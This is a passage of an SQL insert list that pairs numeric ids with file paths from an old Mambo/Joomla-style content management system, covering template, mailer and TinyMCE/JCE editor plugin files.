,'es/js/mambojavascript.js'),(19287,'es/js/overlib_hideform_mini.js'),(19288,'es/js/overlib_mini.js'),(19289,'es/js/tabs/index.html'),(19290,'es/js/tabs/tabpane.js'),(19291,'es/js/tabs/tabpane_mini.js'),(19292,'es/js/wz_tooltip.js'),(19293,'es/mambo.php'),(19294,'es/mamboxml.php'),(19295,'es/metadata.php'),(19296,'es/pageNavigation.php'),(19297,'es/patTemplate/index.html'),(19298,'es/patTemplate/patError.php'),(19299,'es/patTemplate/patErrorManager.php'),(19300,'es/patTemplate/patTemplate/Compiler.php'),(19301,'es/patTemplate/patTemplate/Dump/Html.php'),(19302,'es/patTemplate/patTemplate/Dump/XUL.php'),(19303,'es/patTemplate/patTemplate/Dump/index.html'),(19304,'es/patTemplate/patTemplate/Dump.php'),(19305,'es/patTemplate/patTemplate/Function/Alias.php'),(19306,'es/patTemplate/patTemplate/Function/Attribute.php'),(19307,'es/patTemplate/patTemplate/Function/Call.php'),(19308,'es/patTemplate/patTemplate/Function/Globalvar.php'),(19309,'es/patTemplate/patTemplate/Function/Highlight.php'),(19310,'es/patTemplate/patTemplate/Function/Img.php'),(19311,'es/patTemplate/patTemplate/Function/Joomla.php'),(19312,'es/patTemplate/patTemplate/Function/Phphighlight.php'),(19313,'es/patTemplate/patTemplate/Function/Sef.php'),(19314,'es/patTemplate/patTemplate/Function/Strip.php'),(19315,'es/patTemplate/patTemplate/Function/Time.php'),(19316,'es/patTemplate/patTemplate/Function/Translate.php'),(19317,'es/patTemplate/patTemplate/Function/index.html'),(19318,'es/patTemplate/patTemplate/Function.php'),(19319,'es/patTemplate/patTemplate/InputFilter/ShortModifiers.php'),(19320,'es/patTemplate/patTemplate/InputFilter/StripComments.php'),(19321,'es/patTemplate/patTemplate/InputFilter/index.html'),(19322,'es/patTemplate/patTemplate/InputFilter.php'),(19323,'es/patTemplate/patTemplate/Modifier/Dateformat.php'),(19324,'es/patTemplate/patTemplate/Modifier/Expression.php'),(19325,'es/patTemplate/patTemplate/Modifier/HTML/Img.php'),(19326,'es/patTemplate/patTemplate/Modifier/HTML/SEF.php'),(19327,'es/patTemplate/patTemplate/Modifier/HTML/index.html'),(19328,'es/patTemplate/patTemplate/Modifier/QuoteLatex.php'),(19329,'es/patTemplate/patTemplate/Modifier/Surround.php'),(19330,'es/patTemplate/patTemplate/Modifier/Translate.php'),(19331,'es/patTemplate/patTemplate/Modifier/Truncate.php'),(19332,'es/patTemplate/patTemplate/Modifier/Wordwrapper.php'),(19333,'es/patTemplate/patTemplate/Modifier/index.html'),(19334,'es/patTemplate/patTemplate/Modifier.php'),(19335,'es/patTemplate/patTemplate/Module.php'),(19336,'es/patTemplate/patTemplate/OutputCache.php'),(19337,'es/patTemplate/patTemplate/OutputFilter/BBCode.php'),(19338,'es/patTemplate/patTemplate/OutputFilter/Gzip.php'),(19339,'es/patTemplate/patTemplate/OutputFilter/HighlightPhp.php'),(19340,'es/patTemplate/patTemplate/OutputFilter/PdfLatex.php'),(19341,'es/patTemplate/patTemplate/OutputFilter/StripWhitespace.php'),(19342,'es/patTemplate/patTemplate/OutputFilter/Tidy.php'),(19343,'es/patTemplate/patTemplate/OutputFilter/index.html'),(19344,'es/patTemplate/patTemplate/OutputFilter.php'),(19345,'es/patTemplate/patTemplate/Reader/DB.php'),(19346,'es/patTemplate/patTemplate/Reader/File.php'),(19347,'es/patTemplate/patTemplate/Reader/IT.php'),(19348,'es/patTemplate/patTemplate/Reader/String.php'),(19349,'es/patTemplate/patTemplate/Reader/index.html'),(19350,'es/patTemplate/patTemplate/Reader.php'),(19351,'es/patTemplate/patTemplate/Stat/File.php'),(19352,'es/patTemplate/patTemplate/Stat/index.html'),(19353,'es/patTemplate/patTemplate/Stat.php'),(19354,'es/patTemplate/patTemplate/TemplateCache/File.php'),(19355,'es/patTemplate/patTemplate/TemplateCache/MMCache.php'),(19356,'es/patTemplate/patTemplate/TemplateCache/eAccelerator.php'),(19357,'es/patTemplate/patTemplate/TemplateCache/index.html'),(19358,'es/patTemplate/patTemplate/TemplateCache.php'),(19359,'es/patTemplate/patTemplate/index.html'),(19360,'es/patTemplate/patTemplate.php'),(19361,'es/patTemplate/tmpl/adminfilters.html'),(19362,'es/patTemplate/tmpl/adminlists.html'),(19363,'es/patTemplate/tmpl/calendar.html'),(19364,'es/patTemplate/tmpl/forms.html'),(19365,'es/patTemplate/tmpl/index.html'),(19366,'es/patTemplate/tmpl/page.html'),(19367,'es/pathway.php'),(19368,'es/pdf.php'),(19369,'es/phpInputFilter/class.inputfilter.php'),(19370,'es/phpInputFilter/index.html'),(19371,'es/phpmailer/class.phpmailer.php'),(19372,'es/phpmailer/class.smtp.php'),(19373,'es/phpmailer/index.html'),(19374,'es/phpmailer/language/index.html'),(19375,'es/phpmailer/language/phpmailer.lang-en.php'),(19376,'es/sef.php'),(19377,'es/vcard.class.php'),(19378,'es/version.php'),(19379,'php'),(19380,'.php'),(19381,'ge/english.ignore.php'),(19382,'ge/english.php'),(19383,'ge/index.html'),(19384,'dy.php'),(19385,'s/content/geshi/geshi/css.php'),(19386,'s/content/geshi/geshi/html4strict.php'),(19387,'s/content/geshi/geshi/index.html'),(19388,'s/content/geshi/geshi/ini.php'),(19389,'s/content/geshi/geshi/javascript.php'),(19390,'s/content/geshi/geshi/mysql.php'),(19391,'s/content/geshi/geshi/php-brief.php'),(19392,'s/content/geshi/geshi/php.php'),(19393,'s/content/geshi/geshi/sql.php'),(19394,'s/content/geshi/geshi/xml.php'),(19395,'s/content/geshi/geshi.php'),(19396,'s/content/geshi/index.html'),(19397,'s/content/geshi.php'),(19398,'s/content/index.html'),(19399,'s/content/legacybots.php'),(19400,'s/content/moscode.php'),(19401,'s/content/mosemailcloak.php'),(19402,'s/content/mosimage.php'),(19403,'s/content/mosloadposition.php'),(19404,'s/content/mospaging.php'),(19405,'s/content/mossef.php'),(19406,'s/content/mosvote.php'),(19407,'s/editors/index.html'),(19408,'s/editors/jce/docs/index.html'),(19409,'s/editors/jce/docs/license.htm'),(19410,'s/editors/jce/index.html'),(19411,'s/editors/jce/jscripts/index.html'),(19412,'s/editors/jce/jscripts/tiny_mce/blank.htm'),(19413,'s/editors/jce/jscripts/tiny_mce/index.html'),(19414,'s/editors/jce/jscripts/tiny_mce/jce.functions.js'),(19415,'s/editors/jce/jscripts/tiny_mce/langs/en.js'),(19416,'s/editors/jce/jscripts/tiny_mce/langs/index.html'),(19417,'s/editors/jce/jscripts/tiny_mce/libraries/classes/index.html'),(19418,'s/editors/jce/jscripts/tiny_mce/libraries/classes/jce.class.php'),(19419,'s/editors/jce/jscripts/tiny_mce/libraries/classes/jce.utils.class.php'),(19420,'s/editors/jce/jscripts/tiny_mce/libraries/css/index.html'),(19421,'s/editors/jce/jscripts/tiny_mce/libraries/help/css/index.html'),(19422,'s/editors/jce/jscripts/tiny_mce/libraries/help/help.jce.php'),(19423,'s/editors/jce/jscripts/tiny_mce/libraries/help/index.html'),(19424,'s/editors/jce/jscripts/tiny_mce/libraries/help/jscripts/help.js'),(19425,'s/editors/jce/jscripts/tiny_mce/libraries/help/jscripts/index.html'),(19426,'s/editors/jce/jscripts/tiny_mce/libraries/help/menu.help.php'),(19427,'s/editors/jce/jscripts/tiny_mce/libraries/images/icons/index.html'),(19428,'s/editors/jce/jscripts/tiny_mce/libraries/images/index.html'),(19429,'s/editors/jce/jscripts/tiny_mce/libraries/index.html'),(19430,'s/editors/jce/jscripts/tiny_mce/libraries/jscripts/dtree.js'),(19431,'s/editors/jce/jscripts/tiny_mce/libraries/jscripts/files.js'),(19432,'s/editors/jce/jscripts/tiny_mce/libraries/jscripts/index.html'),(19433,'s/editors/jce/jscripts/tiny_mce/libraries/jscripts/manager.js'),(19434,'s/editors/jce/jscripts/tiny_mce/libraries/jscripts/manager_src.js'),(19435,'s/editors/jce/jscripts/tiny_mce/libraries/jscripts/mootools.js'),(19436,'s/editors/jce/jscripts/tiny_mce/libraries/jscripts/mootools_basic.js'),(19437,'s/editors/jce/jscripts/tiny_mce/libraries/jscripts/tiny_mce_utils.js'),(19438,'s/editors/jce/jscripts/tiny_mce/libraries/jscripts/tiny_mce_utils_src.js'),(19439,'s/editors/jce/jscripts/tiny_mce/libraries/jscripts/utils.js'),(19440,'s/editors/jce/jscripts/tiny_mce/libraries/jscripts/utils_src.js'),(19441,'s/editors/jce/jscripts/tiny_mce/libraries/jscripts/window.js'),(19442,'s/editors/jce/jscripts/tiny_mce/libraries/jscripts/window_src.js'),(19443,'s/editors/jce/jscripts/tiny_mce/libraries/langs/en.php'),(19444,'s/editors/jce/jscripts/tiny_mce/libraries/langs/index.html'),(19445,'s/editors/jce/jscripts/tiny_mce/plugins/advlink/advlink.php'),(19446,'s/editors/jce/jscripts/tiny_mce/plugins/advlink/css/index.html'),(19447,'s/editors/jce/jscripts/tiny_mce/plugins/advlink/editor_plugin.js'),(19448,'s/editors/jce/jscripts/tiny_mce/plugins/advlink/images/index.html'),(19449,'s/editors/jce/jscripts/tiny_mce/plugins/advlink/index.html'),(19450,'s/editors/jce/jscripts/tiny_mce/plugins/advlink/jscripts/functions.js'),(19451,'s/editors/jce/jscripts/tiny_mce/plugins/advlink/jscripts/functions_src.js'),(19452,'s/editors/jce/jscripts/tiny_mce/plugins/advlink/jscripts/index.html'),(19453,'s/editors/jce/jscripts/tiny_mce/plugins/advlink/langs/en.js'),(19454,'s/editors/jce/jscripts/tiny_mce/plugins/advlink/langs/en.php'),(19455,'s/editors/jce/jscripts/tiny_mce/plugins/advlink/langs/index.html'),(19456,'s/editors/jce/jscripts/tiny_mce/plugins/advlink/link.php'),(19457,'s/editors/jce/jscripts/tiny_mce/plugins/contextmenu/css/index.html'),(19458,'s/editors/jce/jscripts/tiny_mce/plugins/contextmenu/editor_plugin.js'),(19459,'s/editors/jce/jscripts/tiny_mce/plugins/contextmenu/images/index.html'),(19460,'s/editors/jce/jscripts/tiny_mce/plugins/contextmenu/index.html'),(19461,'s/editors/jce/jscripts/tiny_mce/plugins/directionality/editor_plugin.js'),(19462,'s/editors/jce/jscripts/tiny_mce/plugins/directionality/images/index.html'),(19463,'s/editors/jce/jscripts/tiny_mce/plugins/directionality/index.html'),(19464,'s/editors/jce/jscripts/tiny_mce/plugins/directionality/langs/en.js'),(19465,'s/editors/jce/jscripts/tiny_mce/plugins/directionality/langs/index.html'),(19466,'s/editors/jce/jscripts/tiny_mce/plugins/emotions/editor_plugin.js'),(19467,'s/editors/jce/jscripts/tiny_mce/plugins/emotions/emotions.htm'),(19468,'s/editors/jce/jscripts/tiny_mce/plugins/emotions/images/index.html'),(19469,'s/editors/jce/jscripts/tiny_mce/plugins/emotions/index.html'),(19470,'s/editors/jce/jscripts/tiny_mce/plugins/emotions/jscripts/functions.js'),(19471,'s/editors/jce/jscripts/tiny_mce/plugins/emotions/jscripts/index.html'),(19472,'s/editors/jce/jscripts/tiny_mce/plugins/emotions/langs/en.js'),(19473,'s/editors/jce/jscripts/tiny_mce/plugins/emotions/langs/index.html'),(19474,'s/editors/jce/jscripts/tiny_mce/plugins/fullscreen/editor_plugin.js'),(19475,'s/editors/jce/jscripts/tiny_mce/plugins/fullscreen/fullscreen.htm'),(19476,'s/editors/jce/jscripts/tiny_mce/plugins/fullscreen/images/index.html'),(19477,'s/editors/jce/jscripts/tiny_mce/plugins/fullscreen/index.html'),(19478,'s/editors/jce/jscripts/tiny_mce/plugins/fullscreen/langs/en.js'),(19479,'s/editors/jce/jscripts/tiny_mce/plugins/fullscreen/langs/index.html'),(19480,'s/editors/jce/jscripts/tiny_mce/plugins/imgmanager/classes/index.html'),(19481,'s/editors/jce/jscripts/tiny_mce/plugins/imgmanager/classes/manager.class.php'),(19482,'s/editors/jce/jscripts/tiny_mce/plugins/imgmanager/css/index.html'),(19483,'s/editors/jce/jscripts/tiny_mce/plugins/imgmanager/editor_plugin.js'),(19484,'s/editors/jce/jscripts/tiny_mce/plugins/imgmanager/files.php'),(19485,'s/editors/jce/jscripts/tiny_mce/plugins/imgmanager/images/index.html'),(19486,'s/editors/jce/jscripts/tiny_mce/plugins/imgmanager/index.html'),(19487,'s/editors/jce/jscripts/tiny_mce/plugins/imgmanager/index.php'),(19488,'s/editors/jce/jscripts/tiny_mce/plugins/imgmanager/jscripts/functions.js'),(19489,'s/editors/jce/jscripts/tiny_mce/plugins/imgmanager/jscripts/functions_src.js'),(19490,'s/editors/jce/jscripts/tiny_mce/plugins/imgmanager/jscripts/index.html'),(19491,'s/editors/jce/jscripts/tiny_mce/plugins/imgmanager/langs/en.js'),(19492,'s/editors/jce/jscripts/tiny_mce/plugins/imgmanager/langs/en.php'),(19493,'s/editors/jce/jscripts/tiny_mce/plugins/imgmanager/langs/index.html'),(19494,'s/editors/jce/jscripts/tiny_mce/plugins/imgmanager/manager.php'),(19495,'s/editors/jce/jscripts/tiny_mce/plugins/index.html'),(19496,'s/editors/jce/jscripts/tiny_mce/plugins/inlinepopups/css/index.html'),(19497,'s/editors/jce/jscripts/tiny_mce/plugins/inlinepopups/editor_plugin.js'),(19498,'s/editors/jce/jscripts/tiny_mce/plugins/inlinepopups/images/index.html'),(19499,'s/editors/jce/jscripts/tiny_mce/plugins/inlinepopups/index.html'),(19500,'s/editors/jce/jscripts/tiny_mce/plugins/inlinepopups/jscripts/index.html'),(19501,'s/editors/jce/jscripts/tiny_mce/plugins/inlinepopups/jscripts/mcwindows.js'),(19502,'s/editors/jce/jscripts/tiny_mce/plugins/layer/editor_plugin.js'),(19503,'s/editors/jce/jscripts/tiny_mce/plugins/layer/langs/en.js'),(19504,'s/editors/jce/jscripts/tiny_mce/plugins/nonbreaking/editor_plugin.js'),(19505,'s/editors/jce/jscripts/tiny_mce/plugins/nonbreaking/images/index.html'),(19506,'s/editors/jce/jscripts/tiny_mce/plugins/nonbreaking/index.html'),(19507,'s/editors/jce/jscripts/tiny_mce/plugins/nonbreaking/langs/en.js'),(19508,'s/editors/jce/jscripts/tiny_mce/plugins/nonbreaking/langs/index.html'),(19509,'s/editors/jce/jscripts/tiny_mce/plugins/paste/blank.htm'),(19510,'s/editors/jce/jscripts/tiny_mce/plugins/paste/css/index.html'),(19511,'s/editors/jce/jscripts/tiny_mce/plugins/paste/editor_plugin.js'),(19512,'s/editors/jce/jscripts/tiny_mce/plugins/paste/images/index.html'),(19513,'s/editors/jce/jscripts/tiny_mce/plugins/paste/index.html'),(19514,'s/editors/jce/jscripts/tiny_mce/plugins/paste/jscripts/index.html'),(19515,'s/editors/jce/jscripts/tiny_mce/plugins/paste/jscripts/pastetext.js'),(19516,'s/editors/jce/jscripts/tiny_mce/plugins/paste/jscripts/pasteword.js'),(19517,'s/editors/jce/jscripts/tiny_mce/plugins/paste/langs/en.js'),(19518,'s/editors/jce/jscripts/tiny_mce/plugins/paste/langs/index.html'),(19519,'s/editors/jce/jscripts/tiny_mce/plugins/paste/pastetext.htm'),(19520,'s/editors/jce/jscripts/tiny_mce/plugins/paste/pasteword.htm'),(19521,'s/editors/jce/jscripts/tiny_mce/plugins/preview/editor_plugin.js'),(19522,'s/editors/jce/jscripts/tiny_mce/plugins/preview/images/index.html'),(19523,'s/editors/jce/jscripts/tiny_mce/plugins/preview/index.html'),(19524,'s/editors/jce/jscripts/tiny_mce/plugins/preview/langs/en.js'),(19525,'s/editors/jce/jscripts/tiny_mce/plugins/preview/langs/index.html'),(19526,'s/editors/jce/jscripts/tiny_mce/plugins/print/editor_plugin.js'),(19527,'s/editors/jce/jscripts/tiny_mce/plugins/print/images/index.html'),(19528,'s/editors/jce/jscripts/tiny_mce/plugins/print/index.html'),(19529,'s/editors/jce/jscripts/tiny_mce/plugins/print/langs/en.js'),(19530,'s/editors/jce/jscripts/tiny_mce/plugins/print/langs/index.html'),(19531,'s/editors/jce/jscripts/tiny_mce/plugins/searchreplace/editor_plugin.js'),(19532,'s/editors/jce/jscripts/tiny_mce/plugins/searchreplace/images/index.html'),(19533,'s/editors/jce/jscripts/tiny_mce/plugins/searchreplace/index.html'),(19534,'s/editors/jce/jscripts/tiny_mce/plugins/searchreplace/jscripts/index.html'),(19535,'s/editors/jce/jscripts/tiny_mce/plugins/searchreplace/jscripts/replace.js'),(19536,'s/editors/jce/jscripts/tiny_mce/plugins/searchreplace/jscripts/search.js'),(19537,'s/editors/jce/jscripts/tiny_mce/plugins/searchreplace/jscripts/searchreplace.js'),(19538,'s/editors/jce/jscripts/tiny_mce/plugins/searchreplace/langs/en.js'),(19539,'s/editors/jce/jscripts/tiny_mce/plugins/searchreplace/langs/index.html'),(19540,'s/editors/jce/jscripts/tiny_mce/plugins/searchreplace/replace.htm'),(19541,'s/editors/jce/jscripts/tiny_mce/plugins/searchreplace/search.htm'),(19542,'s/editors/jce/jscripts/tiny_mce/plugins/searchreplace/searchreplace.htm'),(19543,'s/editors/jce/jscripts/tiny_mce/plugins/spellchecker/classes/TinyGoogleSpell.class.php'),(19544,'s/editors/jce/jscripts/tiny_mce/plugins/spellchecker/classes/TinyPspell.class.php'),(19545,'s/editors/jce/jscripts/tiny_mce/plugins/spellchecker/classes/TinyPspellShell.class.php'),(19546,'s/editors/jce/jscripts/tiny_mce/plugins/spellchecker/classes/index.html'),(19547,'s/editors/jce/jscripts/tiny_mce/plugins/spellchecker/css/index.html'),(19548,'s/editors/jce/jscripts/tiny_mce/plugins/spellchecker/editor_plugin.js'),(19549,'s/editors/jce/jscripts/tiny_mce/plugins/spellchecker/images/index.html'),(19550,'s/editors/jce/jscripts/tiny_mce/plugins/spellchecker/index.html'),(19551,'s/editors/jce/jscripts/tiny_mce/plugins/spellchecker/langs/en.js'),(19552,'s/editors/jce/jscripts/tiny_mce/plugins/spellchecker/langs/index.html'),(19553,'s/editors/jce/jscripts/tiny_mce/plugins/spellchecker/tinyspell.php'),(19554,'s/editors/jce/jscripts/tiny_mce/plugins/style/css/index.html'),(19555,'s/editors/jce/jscripts/tiny_mce/plugins/style/editor_plugin.js'),(19556,'s/editors/jce/jscripts/tiny_mce/plugins/style/images/index.html'),(19557,'s/editors/jce/jscripts/tiny_mce/plugins/style/index.html'),(19558,'s/editors/jce/jscripts/tiny_mce/plugins/style/jscripts/index.html'),(19559,'s/editors/jce/jscripts/tiny_mce/plugins/style/jscripts/props.js'),(19560,'s/editors/jce/jscripts/tiny_mce/plugins/style/langs/en.js'),(19561,'s/editors/jce/jscripts/tiny_mce/plugins/style/langs/index.html'),(19562,'s/editors/jce/jscripts/tiny_mce/plugins/style/props.htm'),(19563,'s/editors/jce/jscripts/tiny_mce/plugins/table/cell.htm'),(19564,'s/editors/jce/jscripts/tiny_mce/plugins/table/css/index.html'),(19565,'s/editors/jce/jscripts/tiny_mce/plugins/table/editor_plugin.js'),(19566,'s/editors/jce/jscripts/tiny_mce/plugins/table/images/index.html'),(19567,'s/editors/jce/jscripts/tiny_mce/plugins/table/index.html'),(19568,'s/editors/jce/jscripts/tiny_mce/plugins/table/jscripts/cell.js'),(19569,'s/editors/jce/jscripts/tiny_mce/plugins/table/jscripts/index.html'),(19570,'s/editors/jce/jscripts/tiny_mce/plugins/table/jscripts/merge_cells.js'),(19571,'s/editors/jce/jscripts/tiny_mce/plugins/table/jscripts/row.js'),(19572,'s/editors/jce/jscripts/tiny_mce/plugins/table/jscripts/table.js'),(19573,'s/editors/jce/jscripts/tiny_mce/plugins/table/langs/en.js'),(19574,'s/editors/jce/jscripts/tiny_mce/plugins/table/langs/index.html'),(19575,'s/editors/jce/jscripts/tiny_mce/plugins/table/merge_cells.htm'),(19576,'s/editors/jce/jscripts/tiny_mce/plugins/table/row.htm'),(19577,'s/editors/jce/jscripts/tiny_mce/plugins/table/table.htm'),(19578,'s/editors/jce/jscripts/tiny_mce/plugins/visualchars/editor_plugin.js'),(19579,'s/editors/jce/jscripts/tiny_mce/plugins/visualchars/images/index.html'),(19580,'s/editors/jce/jscripts/tiny_mce/plugins/visualchars/index.html'),(19581,'s/editors/jce/jscripts/tiny_mce/plugins/visualchars/langs/en.js'),(19582,'s/editors/jce/jscripts/tiny_mce/plugins/visualchars/langs/index.html'),(19583,'s/editors/jce/jscripts/tiny_mce/plugins/xhtmlxtras/abbr.htm'),(19584,'s/editors/jce/jscripts/tiny_mce/plugins/xhtmlxtras/acronym.htm'),(19585,'s/editors/jce/jscripts/tiny_mce/plugins/xhtmlxtras/attributes.htm'),(19586,'s/editors/jce/jscripts/tiny_mce/plugins/xhtmlxtras/cite.htm'),(19587,'s/editors/jce/jscripts/tiny_mce/plugins/xhtmlxtras/css/index.html'),(19588,'s/editors/jce/jscripts/tiny_mce/plugins/xhtmlxtras/del.htm'),(19589,'s/editors/jce/jscripts/tiny_mce/plugins/xhtmlxtras/editor_plugin.js'),(19590,'s/editors/jce/jscripts/tiny_mce/plugins/xhtmlxtras/images/index.html'),(19591,'s/editors/jce/jscripts/tiny_mce/plugins/xhtmlxtras/index.html'),(19592,'s/editors/jce/jscripts/tiny_mce/plugins/xhtmlxtras/ins.htm'),(19593,'s/editors/jce/jscripts/tiny_mce/plugins/xhtmlxtras/jscripts/abbr.js'),(19594,'s/editors/jce/jscripts/tiny_mce/plugins/xhtmlxtras/jscripts/acronym.js'),(19595,'s/editors/jce/jscripts/tiny_mce/plugins/xhtmlxtras/jscripts/attributes.js'),(19596,'s/editors/jce/jscripts/tiny_mce/plugins/xhtmlxtras/jscripts/cite.js'),(19597,'s/editors/jce/jscripts/tiny_mce/plugins/xhtmlxtras/jscripts/del.js'),(19598,'s/editors/jce/jscripts/tiny_mce/plugins/xhtmlxtras/jscripts/element_common.js'),(19599,'s/editors/jce/jscripts/tiny_mce/plugins/xhtmlxtras/jscripts/index.html'),(19600,'s/editors/jce/jscripts/tiny_mce/plugins/xhtmlxtras/jscripts/ins.js'),(19601,'s/editors/jce/jscripts/tiny_mce/plugins/xhtmlxtras/langs/en.js'),(19602,'s/editors/jce/jscripts/tiny_mce/plugins/xhtmlxtras/langs/index.html'),(19603,'s/editors/jce/jscripts/tiny_mce/popupImage.php'),(19604,'s/editors/jce/jscripts/tiny_mce/themes/advanced/about.htm'),(19605,'s/editors/jce/jscripts/tiny_mce/themes/advanced/anchor.htm'),(19606,'s/editors/jce/jscripts/tiny_mce/themes/advanced/charmap.htm'),(19607,'s/editors/jce/jscripts/tiny_mce/themes/advanced/color_picker.htm'),(19608,'s/editors/jce/jscripts/tiny_mce/themes/advanced/css/index.html'),(19609,'s/editors/jce/jscripts/tiny_mce/themes/advanced/docs/en/about.htm'),(19610,'s/editors/jce/jscripts/tiny_mce/themes/advanced/docs/en/common_buttons.htm'),(19611,'s/editors/jce/jscripts/tiny_mce/themes/advanced/docs/en/create_accessible_content.htm'),(19612,'s/editors/jce/jscripts/tiny_mce/themes/advanced/docs/en/index.htm'),(19613,'s/editors/jce/jscripts/tiny_mce/themes/advanced/docs/en/insert_anchor_button.htm'),(19614,'s/editors/jce/jscripts/tiny_mce/themes/advanced/docs/en/insert_image_button.htm'),(19615,'s/editors/jce/jscripts/tiny_mce/themes/advanced/docs/en/insert_link_button.htm'),(19616,'s/editors/jce/jscripts/tiny_mce/themes/advanced/docs/en/insert_table_button.htm'),(19617,'s/editors/jce/jscripts/tiny_mce/themes/advanced/docs/index.html'),(19618,'s/editors/jce/jscripts/tiny_mce/themes/advanced/editor_template.js'),(19619,'s/editors/jce/jscripts/tiny_mce/themes/advanced/image.htm'),(19620,'s/editors/jce/jscripts/tiny_mce/themes/advanced/images/index.html'),(19621,'s/editors/jce/jscripts/tiny_mce/themes/advanced/images/xp/index.html'),(19622,'s/editors/jce/jscripts/tiny_mce/themes/advanced/index.html'),(19623,'s/editors/jce/jscripts/tiny_mce/themes/advanced/jscripts/about.js'),(19624,'s/editors/jce/jscripts/tiny_mce/themes/advanced/jscripts/anchor.js'),(19625,'s/editors/jce/jscripts/tiny_mce/themes/advanced/jscripts/charmap.js'),(19626,'s/editors/jce/jscripts/tiny_mce/themes/advanced/jscripts/color_picker.js'),(19627,'s/editors/jce/jscripts/tiny_mce/themes/advanced/jscripts/image.js'),(19628,'s/editors/jce/jscripts/tiny_mce/themes/advanced/jscripts/index.html'),(19629,'s/editors/jce/jscripts/tiny_mce/themes/advanced/jscripts/link.js'),(19630,'s/editors/jce/jscripts/tiny_mce/themes/advanced/jscripts/source_editor.js'),(19631,'s/editors/jce/jscripts/tiny_mce/themes/advanced/langs/en.js'),(19632,'s/editors/jce/jscripts/tiny_mce/themes/advanced/langs/index.html'),(19633,'s/editors/jce/jscripts/tiny_mce/themes/advanced/link.htm'),(19634,'s/editors/jce/jscripts/tiny_mce/themes/advanced/source_editor.htm'),(19635,'s/editors/jce/jscripts/tiny_mce/themes/index.html'),(19636,'s/editors/jce/jscripts/tiny_mce/tiny_mce.js'),(19637,'s/editors/jce/jscripts/tiny_mce/tiny_mce_gzip.js'),(19638,'s/editors/jce/jscripts/tiny_mce/tiny_mce_gzip.php'),(19639,'s/editors/jce/jscripts/tiny_mce/tiny_mce_popup.js'),(19640,'s/editors/jce/jscripts/tiny_mce/utils/editable_selects.js'),(19641,'s/editors/jce/jscripts/tiny_mce/utils/form_utils.js'),(19642,'s/editors/jce/jscripts/tiny_mce/utils/index.html'),(19643,'s/editors/jce/jscripts/tiny_mce/utils/mclayer.js'),(19644,'s/editors/jce/jscripts/tiny_mce/utils/mctabs.js'),(19645,'s/editors/jce/jscripts/tiny_mce/utils/validate.js'),(19646,'s/editors/jce.php'),(19647,'s/editors/none.php'),(19648,'s/editors/tinymce/index.html'),(19649,'s/editors/tinymce/jscripts/index.html'),(19650,'s/editors/tinymce/jscripts/tiny_mce/blank.htm'),(19651,'s/editors/tinymce/jscripts/tiny_mce/index.html'),(19652,'s/editors/tinymce/jscripts/tiny_mce/langs/en.js'),(19653,'s/editors/tinymce/jscripts/tiny_mce/langs/index.html'),(19654,'s/editors/tinymce/jscripts/tiny_mce/plugins/_template/editor_plugin.js'),(19655,'s/editors/tinymce/jscripts/tiny_mce/plugins/_template/editor_plugin_src.js'),(19656,'s/editors/tinymce/jscripts/tiny_mce/plugins/_template/images/index.html'),(19657,'s/editors/tinymce/jscripts/tiny_mce/plugins/_template/index.html'),(19658,'s/editors/tinymce/jscripts/tiny_mce/plugins/_template/langs/en.js'),(19659,'s/editors/tinymce/jscripts/tiny_mce/plugins/_template/langs/index.html'),(19660,'s/editors/tinymce/jscripts/tiny_mce/plugins/_template/popup.htm'),(19661,'s/editors/tinymce/jscripts/tiny_mce/plugins/advhr/css/index.html'),(19662,'s/editors/tinymce/jscripts/tiny_mce/plugins/advhr/editor_plugin.js'),(19663,'s/editors/tinymce/jscripts/tiny_mce/plugins/advhr/editor_plugin_src.js'),(19664,'s/editors/tinymce/jscripts/tiny_mce/plugins/advhr/images/index.html'),(19665,'s/editors/tinymce/jscripts/tiny_mce/plugins/advhr/index.html'),(19666,'s/editors/tinymce/jscripts/tiny_mce/plugins/advhr/jscripts/index.html'),(19667,'s/editors/tinymce/jscripts/tiny_mce/plugins/advhr/jscripts/rule.js'),(19668,'s/editors/tinymce/jscripts/tiny_mce/plugins/advhr/langs/en.js'),(19669,'s/editors/tinymce/jscripts/tiny_mce/plugins/advhr/langs/index.html'),(19670,'s/editors/tinymce/jscripts/tiny_mce/plugins/advhr/rule.htm'),(19671,'s/editors/tinymce/jscripts/tiny_mce/plugins/advimage/css/index.html'),(19672,'s/editors/tinymce/jscripts/tiny_mce/plugins/advimage/editor_plugin.js'),(19673,'s/editors/tinymce/jscripts/tiny_mce/plugins/advimage/editor_plugin_src.js'),(19674,'s/editors/tinymce/jscripts/tiny_mce/plugins/advimage/image.htm'),(19675,'s/editors/tinymce/jscripts/tiny_mce/plugins/advimage/images/index.html'),(19676,'s/editors/tinymce/jscripts/tiny_mce/plugins/advimage/index.html'),(19677,'s/editors/tinymce/jscripts/tiny_mce/plugins/advimage/jscripts/functions.js'),(19678,'s/editors/tinymce/jscripts/tiny_mce/plugins/advimage/jscripts/index.html'),(19679,'s/editors/tinymce/jscripts/tiny_mce/plugins/advimage/langs/en.js'),(19680,'s/editors/tinymce/jscripts/tiny_mce/plugins/advimage/langs/index.html'),(19681,'s/editors/tinymce/jscripts/tiny_mce/plugins/advlink/css/index.html'),(19682,'s/editors/tinymce/jscripts/tiny_mce/plugins/advlink/editor_plugin.js'),(19683,'s/editors/tinymce/jscripts/tiny_mce/plugins/advlink/editor_plugin_src.js'),(19684,'s/editors/tinymce/jscripts/tiny_mce/plugins/advlink/index.html'),(19685,'s/editors/tinymce/jscripts/tiny_mce/plugins/advlink/jscripts/functions.js'),(19686,'s/editors/tinymce/jscripts/tiny_mce/plugins/advlink/jscripts/index.html'),(19687,'s/editors/tinymce/jscripts/tiny_mce/plugins/advlink/langs/en.js'),(19688,'s/editors/tinymce/jscripts/tiny_mce/plugins/advlink/langs/index.html'),(19689,'s/editors/tinymce/jscripts/tiny_mce/plugins/advlink/link.htm'),(19690,'s/editors/tinymce/jscripts/tiny_mce/plugins/autosave/editor_plugin.js'),(19691,'s/editors/tinymce/jscripts/tiny_mce/plugins/autosave/editor_plugin_src.js'),(19692,'s/editors/tinymce/jscripts/tiny_mce/plugins/autosave/index.html'),(19693,'s/editors/tinymce/jscripts/tiny_mce/plugins/autosave/langs/en.js'),(19694,'s/editors/tinymce/jscripts/tiny_mce/plugins/autosave/langs/index.html'),(19695,'s/editors/tinymce/jscripts/tiny_mce/plugins/cleanup/editor_plugin.js'),(19696,'s/editors/tinymce/jscripts/tiny_mce/plugins/cleanup/editor_plugin_src.js'),(19697,'s/editors/tinymce/jscripts/tiny_mce/plugins/cleanup/index.html'),(19698,'s/editors/tinymce/jscripts/tiny_mce/plugins/contextmenu/css/index.html'),(19699,'s/editors/tinymce/jscripts/ti